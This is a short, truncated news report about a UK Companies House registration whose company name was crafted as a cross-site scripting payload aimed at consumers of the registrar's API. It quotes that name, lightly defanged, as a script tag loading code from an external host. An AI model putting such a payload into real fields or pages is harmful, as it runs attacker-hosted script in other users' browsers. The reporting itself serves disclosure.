Companies House has blocked someone who registered a new biz with a name that contained the right characters arranged in the right order to trigger a cross-site scripting (XSS) attack against users of the service's API.
The company in question, registered number 12956509, was originally signed up with the UK's official company registrar under the name:
">< SCRIPT SRC[=]HTTPS[:]//MJT.XSS.HT> LTD
Its name didn't contain the square brackets, meaning anyone reading company names off the Companies House API would potentially run a script from the web address above.
A person using the username michaeltandy on the Companies House developer forum later posted: "I had assumed I wouldn't be the first person to use < ..
Support the originator by clicking the read the rest link below.